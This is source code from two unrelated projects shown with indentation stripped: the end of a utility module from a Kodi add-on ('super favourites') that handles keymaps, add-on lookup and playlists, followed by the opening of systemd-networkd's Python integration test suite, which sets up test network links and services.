sfile.copy(src, scriptPath)
if VerifyKeymapHot():
reload = True
if VerifyKeymapMenu():
reload = True
if not reload:
return
xbmc.sleep(1000)
xbmc.executebuiltin('Action(reloadkeymaps)')
def VerifyKeymapHot():
if ADDON.getSetting('HOTKEY') == GETTEXT(30111): #i.e. programmable
return False
dest = os.path.join('special://profile/keymaps', KEYMAP_HOT)
if sfile.exists(dest):
return False
key = ADDON.getSetting('HOTKEY')
valid = []
for i in range(30028, 30040):
valid.append(GETTEXT(i))
valid.append(GETTEXT(30058))
includeKey = key in valid
if not includeKey:
DeleteKeymap(KEYMAP_HOT)
return True
if isATV():
DialogOK(GETTEXT(30118), GETTEXT(30119))
return False
return WriteKeymap(key.lower(), key.lower())
def WriteKeymap(start, end):
dest = os.path.join('special://profile/keymaps', KEYMAP_HOT)
cmd = '<keymap><Global><keyboard><%s>XBMC.RunScript(special://home/addons/plugin.program.super.favourites/hot.py)</%s></keyboard></Global></keymap>' % (start, end)
f = sfile.file(dest, 'w')
f.write(cmd)
f.close()
xbmc.sleep(1000)
tries = 4
while not sfile.exists(dest) and tries > 0:
tries -= 1
f = sfile.file(dest, 'w')
f.write(cmd)
f.close()
xbmc.sleep(1000)
return True
def VerifyKeymapMenu():
context = ADDON.getSetting('CONTEXT') == 'true'
if not context:
DeleteKeymap(KEYMAP_MENU)
return True
keymap = 'special://profile/keymaps'
dst = os.path.join(keymap, KEYMAP_MENU)
if sfile.exists(dst):
return False
src = os.path.join(HOME, 'resources', 'keymaps', KEYMAP_MENU)
sfile.makedirs(keymap)
sfile.copy(src, dst)
return True
def verifyPlayMedia(cmd):
return True
def verifyPlugin(cmd):
try:
plugin = re.compile('plugin://(.+?)/').search(cmd).group(1)
return xbmc.getCondVisibility('System.HasAddon(%s)' % plugin) == 1
except:
pass
return True
def verifyScript(cmd):
try:
script = cmd.split('(', 1)[1].split(',', 1)[0].replace(')', '').replace('"', '')
script = script.split('/', 1)[0]
return xbmc.getCondVisibility('System.HasAddon(%s)' % script) == 1
except:
pass
return True
def isATV():
return xbmc.getCondVisibility('System.Platform.ATV2') == 1
def GetFolder(title):
default = ROOT
sfile.makedirs(PROFILE)
folder = xbmcgui.Dialog().browse(3, title, 'files', '', False, False, default)
if folder == default:
return None
return folder
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
def escape(text):
return str(''.join(html_escape_table.get(c,c) for c in text))
def unescape(text):
text = text.replace('&', '&')
text = text.replace('"', '"')
text = text.replace(''', '\'')
text = text.replace('>', '>')
text = text.replace('<', '<')
return text
def fix(text):
ret = ''
for ch in text:
if ord(ch) < 128:
ret += ch
return ret.strip()
def Clean(name):
import re
name = re.sub('\([0-9)]*\)', '', name)
items = name.split(']')
name = ''
for item in items:
if len(item) == 0:
continue
item += ']'
item = re.sub('\[[^)]*\]', '', item)
if len(item) > 0:
name += item
name = name.replace('[', '')
name = name.replace(']', '')
name = name.strip()
while True:
length = len(name)
name = name.replace(' ', ' ')
if length == len(name):
break
return name.strip()
def CleanForSort(text):
text = text[0]
text = text.lower()
text = Clean(text)
return text
def fileSystemSafe(text):
if not text:
return None
text = re.sub('[:\\\\/*?\<>|"]+', '', text)
text = text.strip()
if len(text) < 1:
return None
return text
def findAddon(item):
try:
try: addon = re.compile('"(.+?)"').search(item).group(1)
except: addon = item
addon = addon.replace('plugin://', '')
addon = addon.replace('script://', '')
addon = addon.replace('/', '')
addon = addon.split('?', 1)[0]
if xbmc.getCondVisibility('System.HasAddon(%s)' % addon) == 0:
addon = None
except:
addon = None
return addon
def getSettingsLabel(addon):
label = xbmcaddon.Addon(addon).getAddonInfo('name')
label = fix(label)
label = label.strip()
try:
if len(label) > 0:
return GETTEXT(30094) % label
except:
pass
return GETTEXT(30094) % GETTEXT(30217)
#logic for setting focus inspired by lambda
def openSettings(addonID, focus=None):
if not focus:
return xbmcaddon.Addon(addonID).openSettings()
try:
xbmc.executebuiltin('Addon.OpenSettings(%s)' % addonID)
value1, value2 = str(focus).split('.')
if FRODO:
xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 200))
xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 100))
else:
xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 100))
xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 200))
except:
return
#Remove Tags method from
#http://stackoverflow.com/questions/9662346/python-code-to-remove-html-tags-from-a-string
TAG_RE = re.compile('<.*?>')
def RemoveTags(html):
return TAG_RE.sub('', html)
def showBusy():
busy = None
try:
import xbmcgui
busy = xbmcgui.WindowXMLDialog('DialogBusy.xml', '')
busy.show()
try: busy.getControl(10).setVisible(False)
except: pass
except:
busy = None
return busy
def showText(heading, text, waitForClose=False):
id = 10147
xbmc.executebuiltin('ActivateWindow(%d)' % id)
xbmc.sleep(100)
win = xbmcgui.Window(id)
retry = 50
while (retry > 0):
try:
xbmc.sleep(10)
win.getControl(1).setLabel(heading)
win.getControl(5).setText(text)
retry = 0
except:
retry -= 1
if waitForClose:
while xbmc.getCondVisibility('Window.IsVisible(%d)' % id) == 1:
xbmc.sleep(50)
def showChangelog(addonID=None):
try:
if addonID:
ADDON = xbmcaddon.Addon(addonID)
else:
ADDON = xbmcaddon.Addon(ADDONID)
text = sfile.read(ADDON.getAddonInfo('changelog'))
title = '%s - %s' % (xbmc.getLocalizedString(24054), ADDON.getAddonInfo('name'))
showText(title, text)
except:
pass
def getAllPlayableFiles(folder):
files = {}
_getAllPlayableFiles(folder, files)
return files
def _getAllPlayableFiles(folder, theFiles):
current, dirs, files = sfile.walk(folder)
for dir in dirs:
path = os.path.join(current, dir)
_getAllPlayableFiles(path, theFiles)
for file in files:
path = os.path.join(current, file)
if isPlayable(path):
size = sfile.size(path)
theFiles[path] = [path, size]
def isFilePlayable(path):
try: return ('.' + sfile.getextension(path) in PLAYABLE)
except: return False
def isPlayable(path):
if not sfile.exists(path):
return False
if sfile.isfile(path):
playable = isFilePlayable(path)
return playable
current, dirs, files = sfile.walk(path)
for file in files:
if isPlayable(os.path.join(current, file)):
return True
for dir in dirs:
if isPlayable(os.path.join(current, dir)):
return True
return False
def parseFolder(folder, subfolders=True):
items = []
current, dirs, files = sfile.walk(folder)
if subfolders:
for dir in dirs:
path = os.path.join(current, dir)
if isPlayable(path):
items.append([dir, path, False])
for file in files:
path = os.path.join(current, file)
if isPlayable(path):
items.append([file, path, True])
return items
def getPrefix(index):
index += 1
prefix = str(index) + NUMBER_SEP
if index < 10:
prefix = '0' + prefix
return prefix, index
def addPrefixToLabel(index, label, addPrefix=None):
if addPrefix == None:
addPrefix = LABEL_NUMERIC
if not addPrefix:
return label, index
prefix, index = getPrefix(index)
locn = -1
SEARCHING = 0
INELEMENT = 1
BODY = 2
mode = SEARCHING
for c in label:
locn += 1
if mode == SEARCHING:
if c is '[':
mode = INELEMENT
else:
mode = BODY
elif mode == INELEMENT:
if c is ']':
mode = SEARCHING
if mode == BODY:
break
label = label[:locn] + prefix + label[locn:]
return label, index
def playItems(items, id=-1):
if items == None or len(items) < 1:
return
pl = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
pl.clear()
resolved = False
for item in items:
title = item[0]
url = item[1]
if len(item) > 2:
iconImage = item[2]
else:
iconImage = ICON
liz = xbmcgui.ListItem(title, iconImage=iconImage, thumbnailImage=iconImage)
liz.setInfo(type='Video', infoLabels={'Title':title})
pl.add(url, liz)
if id >= 0 and (not resolved):
import xbmcplugin
resolved = True
xbmcplugin.setResolvedUrl(id, True, liz)
if id == -1:
xbmc.Player().play(pl)
def convertToHome(text):
if text.startswith(HOMEFULL):
text = text.replace(HOMEFULL, HOMESPECIAL)
return text
if __name__ == '__main__':
pass | AMOboxTV/AMOBox.LegoBuild | plugin.program.super.favourites/utils.py | Python | gpl-2.0 | 18,265 |
#!/usr/bin/env python3
# SPDX-License-Identifier: LGPL-2.1+
# systemd-networkd tests
import argparse
import os
import re
import shutil
import signal
import subprocess
import sys
import time
import unittest
from shutil import copytree
network_unit_file_path='/run/systemd/network'
networkd_runtime_directory='/run/systemd/netif'
networkd_ci_path='/run/networkd-ci'
network_sysctl_ipv6_path='/proc/sys/net/ipv6/conf'
network_sysctl_ipv4_path='/proc/sys/net/ipv4/conf'
dnsmasq_pid_file='/run/networkd-ci/test-test-dnsmasq.pid'
dnsmasq_log_file='/run/networkd-ci/test-dnsmasq-log-file'
systemd_lib_paths=['/usr/lib/systemd', '/lib/systemd']
which_paths=':'.join(systemd_lib_paths + os.getenv('PATH', os.defpath).lstrip(':').split(':'))
networkd_bin=shutil.which('systemd-networkd', path=which_paths)
resolved_bin=shutil.which('systemd-resolved', path=which_paths)
wait_online_bin=shutil.which('systemd-networkd-wait-online', path=which_paths)
networkctl_bin=shutil.which('networkctl', path=which_paths)
resolvectl_bin=shutil.which('resolvectl', path=which_paths)
timedatectl_bin=shutil.which('timedatectl', path=which_paths)
use_valgrind=False
enable_debug=True
env = {}
asan_options=None
lsan_options=None
ubsan_options=None
running_units = []
def check_output(*command, **kwargs):
# This replaces both check_output and check_call (output can be ignored)
command = command[0].split() + list(command[1:])
return subprocess.check_output(command, universal_newlines=True, **kwargs).rstrip()
def call(*command, **kwargs):
command = command[0].split() + list(command[1:])
return subprocess.call(command, universal_newlines=True, **kwargs)
def run(*command, **kwargs):
command = command[0].split() + list(command[1:])
return subprocess.run(command, universal_newlines=True, **kwargs)
def is_module_available(module_name):
lsmod_output = check_output('lsmod')
module_re = re.compile(rf'^{re.escape(module_name)}\b', re.MULTILINE)
return module_re.search(lsmod_output) or not call('modprobe', module_name, stderr=subprocess.DEVNULL)
def expectedFailureIfModuleIsNotAvailable(module_name):
def f(func):
if not is_module_available(module_name):
return unittest.expectedFailure(func)
return func
return f
def expectedFailureIfERSPANModuleIsNotAvailable():
def f(func):
rc = call('ip link add dev erspan99 type erspan seq key 30 local 192.168.1.4 remote 192.168.1.1 erspan_ver 1 erspan 123', stderr=subprocess.DEVNULL)
if rc == 0:
call('ip link del erspan99')
return func
else:
return unittest.expectedFailure(func)
return f
def expectedFailureIfRoutingPolicyPortRangeIsNotAvailable():
def f(func):
rc = call('ip rule add from 192.168.100.19 sport 1123-1150 dport 3224-3290 table 7', stderr=subprocess.DEVNULL)
if rc == 0:
call('ip rule del from 192.168.100.19 sport 1123-1150 dport 3224-3290 table 7')
return func
else:
return unittest.expectedFailure(func)
return f
def expectedFailureIfRoutingPolicyIPProtoIsNotAvailable():
def f(func):
rc = call('ip rule add not from 192.168.100.19 ipproto tcp table 7', stderr=subprocess.DEVNULL)
if rc == 0:
call('ip rule del not from 192.168.100.19 ipproto tcp table 7')
return func
else:
return unittest.expectedFailure(func)
return f
def expectedFailureIfLinkFileFieldIsNotSet():
def f(func):
support = False
rc = call('ip link add name dummy99 type dummy', stderr=subprocess.DEVNULL)
if rc == 0:
ret = run('udevadm info -w10s /sys/class/net/dummy99', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
if ret.returncode == 0 and 'E: ID_NET_LINK_FILE=' in ret.stdout.rstrip():
support = True
call('ip link del dummy99')
if support:
return func
else:
return unittest.expectedFailure(func)
return f
def expectedFailureIfNexthopIsNotAvailable():
def f(func):
rc = call('ip nexthop list', stderr=subprocess.DEVNULL)
if rc == 0:
return func
else:
return unittest.expectedFailure(func)
return f
def expectedFailureIfAlternativeNameIsNotAvailable():
def f(func):
call('ip link add dummy98 type dummy', stderr=subprocess.DEVNULL)
rc = call('ip link prop add dev dummy98 altname hogehogehogehogehoge', stderr=subprocess.DEVNULL)
if rc == 0:
return func
else:
return unittest.expectedFailure(func)
return f
def setUpModule():
global running_units
os.makedirs(network_unit_file_path, exist_ok=True)
os.makedirs(networkd_ci_path, exist_ok=True)
shutil.rmtree(networkd_ci_path)
copytree(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf'), networkd_ci_path)
for u in ['systemd-networkd.socket', 'systemd-networkd.service', 'systemd-resolved.service', 'firewalld.service']:
if call(f'systemctl is-active --quiet {u}') == 0:
check_output(f'systemctl stop {u}')
running_units.append(u)
drop_in = [
'[Unit]',
'StartLimitIntervalSec=0',
'[Service]',
'Restart=no',
'ExecStart=',
]
if use_valgrind:
drop_in += [
'ExecStart=!!valgrind --track-origins=yes --leak-check=full --show-leak-kinds=all ' + networkd_bin,
'PrivateTmp=yes'
]
else:
drop_in += ['ExecStart=!!' + networkd_bin]
if enable_debug:
drop_in += ['Environment=SYSTEMD_LOG_LEVEL=debug']
if asan_options:
drop_in += ['Environment=ASAN_OPTIONS="' + asan_options + '"']
if lsan_options:
drop_in += ['Environment=LSAN_OPTIONS="' + lsan_options + '"']
if ubsan_options:
drop_in += ['Environment=UBSAN_OPTIONS="' + ubsan_options + '"']
if asan_options or lsan_options or ubsan_options:
drop_in += ['SystemCallFilter=']
if use_valgrind or asan_options or lsan_options or ubsan_options:
drop_in += ['MemoryDenyWriteExecute=no']
os.makedirs('/run/systemd/system/systemd-networkd.service.d', exist_ok=True)
with open('/run/systemd/system/systemd-networkd.service.d/00-override.conf', mode='w') as f:
f.write('\n'.join(drop_in))
drop_in = [
'[Service]',
'Restart=no',
'ExecStart=',
]
if use_valgrind:
drop_in += ['ExecStart=!!valgrind --track-origins=yes --leak-check=full --show-leak-kinds=all ' + resolved_bin]
else:
drop_in += ['ExecStart=!!' + resolved_bin]
if enable_debug:
drop_in += ['Environment=SYSTEMD_LOG_LEVEL=debug']
if asan_options:
drop_in += ['Environment=ASAN_OPTIONS="' + asan_options + '"']
if lsan_options:
drop_in += ['Environment=LSAN_OPTIONS="' + lsan_options + '"']
if ubsan_options:
drop_in += ['Environment=UBSAN_OPTIONS="' + ubsan_options + '"']
if asan_options or lsan_options or ubsan_options:
drop_in += ['SystemCallFilter=']
if use_valgrind or asan_options or lsan_options or ubsan_options:
drop_in += ['MemoryDenyWriteExecute=no']
os.makedirs('/run/systemd/system/systemd-resolved.service.d', exist_ok=True)
with open('/run/systemd/system/systemd-resolved.service.d/00-override.conf', mode='w') as f:
f.write('\n'.join(drop_in))
check_output('systemctl daemon-reload')
print(check_output('systemctl cat systemd-networkd.service'))
print(check_output('systemctl cat systemd-resolved.service'))
check_output('systemctl restart systemd-resolved')
def tearDownModule():
global running_units
shutil.rmtree(networkd_ci_path)
for u in ['systemd-networkd.service', 'systemd-resolved.service']:
check_output(f'systemctl stop {u}')
shutil.rmtree('/run/systemd/system/systemd-networkd.service.d')
shutil.rmtree('/run/systemd/system/systemd-resolved.service.d')
check_output('systemctl daemon-reload')
for u in running_units:
check_output(f'systemctl start {u}')
def read_link_attr(*args):
with open(os.path.join('/sys/class/net/', *args)) as f:
return f.readline().strip()
def read_bridge_port_attr(bridge, link, attribute):
path_bridge = os.path.join('/sys/devices/virtual/net', bridge)
path_port = 'lower_' + link + '/brport'
path = os.path.join(path_bridge, path_port)
with open(os.path.join(path, attribute)) as f:
return f.readline().strip()
def link_exists(link):
return os.path.exists(os.path.join('/sys/class/net', link))
def remove_links(links):
for link in links:
if link_exists(link):
call('ip link del dev', link)
time.sleep(1)
def remove_fou_ports(ports):
for port in ports:
call('ip fou del port', port, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def remove_routing_policy_rule_tables(tables):
for table in tables:
rc = 0
while rc == 0:
rc = call('ip rule del table', table, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def remove_routes(routes):
for route_type, addr in routes:
call('ip route del', route_type, addr, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def remove_l2tp_tunnels(tunnel_ids):
output = check_output('ip l2tp show tunnel')
for tid in tunnel_ids:
words='Tunnel ' + tid + ', encap'
if words in output:
call('ip l2tp del tunnel tid', tid)
time.sleep(1)
def read_ipv6_sysctl_attr(link, attribute):
with open(os.path.join(os.path.join(network_sysctl_ipv6_path, link), attribute)) as f:
return f.readline().strip()
def read_ipv4_sysctl_attr(link, attribute):
with open(os.path.join(os.path.join(network_sysctl_ipv4_path, link), attribute)) as f:
return f.readline().strip()
def copy_unit_to_networkd_unit_path(*units, dropins=True):
"""Copy networkd unit files into the testbed.
Any networkd unit file type can be specified, as well as drop-in files.
By default, all drop-ins for a specified unit file are copied in;
to avoid that specify dropins=False.
When a drop-in file is specified, its unit file is also copied in automatically.
"""
print()
for unit in units:
if dropins and os.path.exists(os.path.join(networkd_ci_path, unit + '.d')):
copytree(os.path.join(networkd_ci_path, unit + '.d'), os.path.join(network_unit_file_path, unit + '.d'))
if unit.endswith('.conf'):
dropin = unit
dropindir = os.path.join(network_unit_file_path, os.path.dirname(dropin))
os.makedirs(dropindir, exist_ok=True)
shutil.copy(os.path.join(networkd_ci_path, dropin), dropindir)
unit = os.path.dirname(dropin).rstrip('.d')
shutil.copy(os.path.join(networkd_ci_path, unit), network_unit_file_path)
def remove_unit_from_networkd_path(units):
"""Remove previously copied unit files from the testbed.
Drop-ins will be removed automatically.
"""
for unit in units:
if (os.path.exists(os.path.join(network_unit_file_path, unit))):
os.remove(os.path.join(network_unit_file_path, unit))
if (os.path.exists(os.path.join(network_unit_file_path, unit + '.d'))):
shutil.rmtree(os.path.join(network_unit_file_path, unit + '.d'))
def start_dnsmasq(additional_options='', ipv4_range='192.168.5.10,192.168.5.200', ipv6_range='2600::10,2600::20', lease_time='1h'):
dnsmasq_command = f'dnsmasq -8 /var/run/networkd-ci/test-dnsmasq-log-file --log-queries=extra --log-dhcp --pid-file=/var/run/networkd-ci/test-test-dnsmasq.pid --conf-file=/dev/null --interface=veth-peer --enable-ra --dhcp-range={ipv6_range},{lease_time} --dhcp-range={ipv4_range},{lease_time} -R --dhcp-leasefile=/var/run/networkd-ci/lease --dhcp-option=26,1492 --dhcp-option=option:router,192.168.5.1 --dhcp-option=33,192.168.5.4,192.168.5.5 --port=0 ' + additional_options
check_output(dnsmasq_command)
def stop_dnsmasq(pid_file):
if os.path.exists(pid_file):
with open(pid_file, 'r') as f:
pid = f.read().rstrip(' \t\r\n\0')
os.kill(int(pid), signal.SIGTERM)
os.remove(pid_file)
def search_words_in_dnsmasq_log(words, show_all=False):
if os.path.exists(dnsmasq_log_file):
with open (dnsmasq_log_file) as in_file:
contents = in_file.read()
if show_all:
print(contents)
for line in contents.splitlines():
if words in line:
in_file.close()
print("%s, %s" % (words, line))
return True
return False
def remove_lease_file():
if os.path.exists(os.path.join(networkd_ci_path, 'lease')):
os.remove(os.path.join(networkd_ci_path, 'lease'))
def remove_log_file():
if os.path.exists(dnsmasq_log_file):
os.remove(dnsmasq_log_file)
def remove_networkd_state_files():
if os.path.exists(os.path.join(networkd_runtime_directory, 'state')):
os.remove(os.path.join(networkd_runtime_directory, 'state'))
def stop_networkd(show_logs=True, remove_state_files=True):
if show_logs:
invocation_id = check_output('systemctl show systemd-networkd -p InvocationID --value')
check_output('systemctl stop systemd-networkd')
if show_logs:
print(check_output('journalctl _SYSTEMD_INVOCATION_ID=' + invocation_id))
if remove_state_files:
remove_networkd_state_files()
def start_networkd(sleep_sec=0):
check_output('systemctl start systemd-networkd')
if sleep_sec > 0:
time.sleep(sleep_sec)
def restart_networkd(sleep_sec=0, show_logs=True, remove_state_files=True):
stop_networkd(show_logs, remove_state_files)
start_networkd(sleep_sec)
def get_operstate(link, show_status=True, setup_state='configured'):
output = check_output(*networkctl_cmd, 'status', link, env=env)
if show_status:
print(output)
for line in output.splitlines():
if 'State:' in line and (not setup_state or setup_state in line):
return line.split()[1]
return None
class Utilities():
def check_link_exists(self, link):
self.assertTrue(link_exists(link))
def check_operstate(self, link, expected, show_status=True, setup_state='configured'):
self.assertRegex(get_operstate(link, show_status, setup_state), expected)
def wait_online(self, links_with_operstate, timeout='20s', bool_any=False, setup_state='configured', setup_timeout=5):
args = wait_online_cmd + [f'--timeout={timeout}'] + [f'--interface={link}' for link in links_with_operstate]
if bool_any:
args += ['--any']
try:
check_output(*args, env=env)
except subprocess.CalledProcessError:
for link in links_with_operstate:
output = check_output(*networkctl_cmd, 'status', link.split(':')[0], env=env)
print(output)
raise
if not bool_any and setup_state:
# check at least once now, then once per sec for setup_timeout secs
for secs in range(setup_timeout + 1):
for link in links_with_operstate:
output = check_output(*networkctl_cmd, 'status', link.split(':')[0])
print(output)
if not re.search(rf'(?m)^\s*State:.*({setup_state}).*$', output):
# this link isn't in the right state; break into the sleep below
break
else:
# all the links were in the right state; break to exit the timer loop
break
# don't bother sleeping if time is up
if secs < setup_timeout:
time.sleep(1)
else:
self.fail(f'link {link} state does not match {setup_state}')
def wait_address(self, link, address_regex, scope='global', ipv='', timeout_sec=100):
for i in range(timeout_sec):
if i > 0:
time.sleep(1)
output = check_output(f'ip {ipv} address show dev {link} scope {scope}')
if re.search(address_regex, output):
break
else:
self.assertRegex(output, address_regex)
class NetworkctlTests(unittest.TestCase, Utilities):
links = [
'dummy98',
'test1',
'veth99',
]
units = [
'11-dummy.netdev',
'11-dummy-mtu.netdev',
'11-dummy.network',
'12-dummy.netdev',
'12-dummy.link',
'25-address-static.network',
'25-veth.netdev',
'netdev-link-local-addressing-yes.network',
]
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
@expectedFailureIfAlternativeNameIsNotAvailable()
def test_altname(self):
copy_unit_to_networkd_unit_path('netdev-link-local-addressing-yes.network', '12-dummy.netdev', '12-dummy.link')
check_output('udevadm control --reload')
start_networkd()
self.wait_online(['dummy98:degraded'])
output = check_output(*networkctl_cmd, 'status', 'dummy98', env=env)
self.assertRegex(output, 'hogehogehogehogehogehoge')
def test_reconfigure(self):
copy_unit_to_networkd_unit_path('25-address-static.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('ip -4 address show dev dummy98')
print(output)
self.assertRegex(output, 'inet 10.1.2.3/16 brd 10.1.255.255 scope global dummy98')
self.assertRegex(output, 'inet 10.1.2.4/16 brd 10.1.255.255 scope global secondary dummy98')
self.assertRegex(output, 'inet 10.2.2.4/16 brd 10.2.255.255 scope global dummy98')
check_output('ip address del 10.1.2.3/16 dev dummy98')
check_output('ip address del 10.1.2.4/16 dev dummy98')
check_output('ip address del 10.2.2.4/16 dev dummy98')
check_output(*networkctl_cmd, 'reconfigure', 'dummy98', env=env)
self.wait_online(['dummy98:routable'])
output = check_output('ip -4 address show dev dummy98')
print(output)
self.assertRegex(output, 'inet 10.1.2.3/16 brd 10.1.255.255 scope global dummy98')
self.assertRegex(output, 'inet 10.1.2.4/16 brd 10.1.255.255 scope global secondary dummy98')
self.assertRegex(output, 'inet 10.2.2.4/16 brd 10.2.255.255 scope global dummy98')
def test_reload(self):
start_networkd(3)
copy_unit_to_networkd_unit_path('11-dummy.netdev')
check_output(*networkctl_cmd, 'reload', env=env)
time.sleep(3)
self.check_link_exists('test1')
self.check_operstate('test1', 'off', setup_state='unmanaged')
copy_unit_to_networkd_unit_path('11-dummy.network')
check_output(*networkctl_cmd, 'reload', env=env)
self.wait_online(['test1:degraded'])
remove_unit_from_networkd_path(['11-dummy.network'])
check_output(*networkctl_cmd, 'reload', env=env)
time.sleep(1)
self.check_operstate('test1', 'degraded', setup_state='unmanaged')
remove_unit_from_networkd_path(['11-dummy.netdev'])
check_output(*networkctl_cmd, 'reload', env=env)
self.check_operstate('test1', 'degraded', setup_state='unmanaged')
copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
check_output(*networkctl_cmd, 'reload', env=env)
self.check_operstate('test1', 'degraded')
def test_glob(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output(*networkctl_cmd, 'list', env=env)
self.assertRegex(output, '1 lo ')
self.assertRegex(output, 'test1')
output = check_output(*networkctl_cmd, 'list', 'test1', env=env)
self.assertNotRegex(output, '1 lo ')
self.assertRegex(output, 'test1')
output = check_output(*networkctl_cmd, 'list', 'te*', env=env)
self.assertNotRegex(output, '1 lo ')
self.assertRegex(output, 'test1')
output = check_output(*networkctl_cmd, 'status', 'te*', env=env)
self.assertNotRegex(output, '1: lo ')
self.assertRegex(output, 'test1')
output = check_output(*networkctl_cmd, 'status', 'tes[a-z][0-9]', env=env)
self.assertNotRegex(output, '1: lo ')
self.assertRegex(output, 'test1')
def test_mtu(self):
copy_unit_to_networkd_unit_path('11-dummy-mtu.netdev', '11-dummy.network')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
self.assertRegex(output, 'MTU: 1600')
def test_type(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
print(output)
self.assertRegex(output, 'Type: ether')
output = check_output(*networkctl_cmd, 'status', 'lo', env=env)
print(output)
self.assertRegex(output, 'Type: loopback')
@expectedFailureIfLinkFileFieldIsNotSet()
def test_udev_link_file(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
print(output)
self.assertRegex(output, r'Link File: (/usr)?/lib/systemd/network/99-default.link')
self.assertRegex(output, r'Network File: /run/systemd/network/11-dummy.network')
output = check_output(*networkctl_cmd, 'status', 'lo', env=env)
print(output)
self.assertRegex(output, r'Link File: (/usr)?/lib/systemd/network/99-default.link')
self.assertRegex(output, r'Network File: n/a')
def test_delete_links(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network',
'25-veth.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['test1:degraded', 'veth99:degraded', 'veth-peer:degraded'])
check_output(*networkctl_cmd, 'delete', 'test1', 'veth99', env=env)
self.assertFalse(link_exists('test1'))
self.assertFalse(link_exists('veth99'))
self.assertFalse(link_exists('veth-peer'))
class NetworkdNetDevTests(unittest.TestCase, Utilities):
links_remove_earlier = [
'xfrm99',
]
links = [
'6rdtun99',
'bond99',
'bridge99',
'dropin-test',
'dummy98',
'erspan98',
'erspan99',
'geneve99',
'gretap96',
'gretap98',
'gretap99',
'gretun96',
'gretun97',
'gretun98',
'gretun99',
'ifb99',
'ip6gretap98',
'ip6gretap99',
'ip6gretun96',
'ip6gretun97',
'ip6gretun98',
'ip6gretun99',
'ip6tnl97',
'ip6tnl98',
'ip6tnl99',
'ipiptun96',
'ipiptun97',
'ipiptun98',
'ipiptun99',
'ipvlan99',
'ipvtap99',
'isataptun99',
'macvlan99',
'macvtap99',
'nlmon99',
'sittun96',
'sittun97',
'sittun98',
'sittun99',
'tap99',
'test1',
'tun99',
'vcan99',
'veth99',
'vlan99',
'vrf99',
'vti6tun97',
'vti6tun98',
'vti6tun99',
'vtitun96',
'vtitun97',
'vtitun98',
'vtitun99',
'vxcan99',
'vxlan99',
'wg98',
'wg99',
]
units = [
'10-dropin-test.netdev',
'11-dummy.netdev',
'11-dummy.network',
'12-dummy.netdev',
'13-not-match-udev-property.network',
'14-match-udev-property.network',
'15-name-conflict-test.netdev',
'21-macvlan.netdev',
'21-macvtap.netdev',
'21-vlan-test1.network',
'21-vlan.netdev',
'21-vlan.network',
'25-6rd-tunnel.netdev',
'25-bond.netdev',
'25-bond-balanced-tlb.netdev',
'25-bridge.netdev',
'25-bridge-configure-without-carrier.network',
'25-bridge.network',
'25-erspan-tunnel-local-any.netdev',
'25-erspan-tunnel.netdev',
'25-fou-gretap.netdev',
'25-fou-gre.netdev',
'25-fou-ipip.netdev',
'25-fou-ipproto-gre.netdev',
'25-fou-ipproto-ipip.netdev',
'25-fou-sit.netdev',
'25-geneve.netdev',
'25-gretap-tunnel-local-any.netdev',
'25-gretap-tunnel.netdev',
'25-gre-tunnel-any-any.netdev',
'25-gre-tunnel-local-any.netdev',
'25-gre-tunnel-remote-any.netdev',
'25-gre-tunnel.netdev',
'25-ifb.netdev',
'25-ip6gretap-tunnel-local-any.netdev',
'25-ip6gretap-tunnel.netdev',
'25-ip6gre-tunnel-any-any.netdev',
'25-ip6gre-tunnel-local-any.netdev',
'25-ip6gre-tunnel-remote-any.netdev',
'25-ip6gre-tunnel.netdev',
'25-ip6tnl-tunnel-any-any.netdev',
'25-ip6tnl-tunnel-local-any.netdev',
'25-ip6tnl-tunnel-remote-any.netdev',
'25-ip6tnl-tunnel.netdev',
'25-ipip-tunnel-any-any.netdev',
'25-ipip-tunnel-independent.netdev',
'25-ipip-tunnel-independent-loopback.netdev',
'25-ipip-tunnel-local-any.netdev',
'25-ipip-tunnel-remote-any.netdev',
'25-ipip-tunnel.netdev',
'25-ipvlan.netdev',
'25-ipvtap.netdev',
'25-isatap-tunnel.netdev',
'25-macsec.key',
'25-macsec.netdev',
'25-macsec.network',
'25-nlmon.netdev',
'25-sit-tunnel-any-any.netdev',
'25-sit-tunnel-local-any.netdev',
'25-sit-tunnel-remote-any.netdev',
'25-sit-tunnel.netdev',
'25-tap.netdev',
'25-tun.netdev',
'25-tunnel-local-any.network',
'25-tunnel-remote-any.network',
'25-tunnel.network',
'25-vcan.netdev',
'25-veth.netdev',
'25-vrf.netdev',
'25-vti6-tunnel-any-any.netdev',
'25-vti6-tunnel-local-any.netdev',
'25-vti6-tunnel-remote-any.netdev',
'25-vti6-tunnel.netdev',
'25-vti-tunnel-any-any.netdev',
'25-vti-tunnel-local-any.netdev',
'25-vti-tunnel-remote-any.netdev',
'25-vti-tunnel.netdev',
'25-vxcan.netdev',
'25-vxlan.netdev',
'25-wireguard-23-peers.netdev',
'25-wireguard-23-peers.network',
'25-wireguard-preshared-key.txt',
'25-wireguard-private-key.txt',
'25-wireguard.netdev',
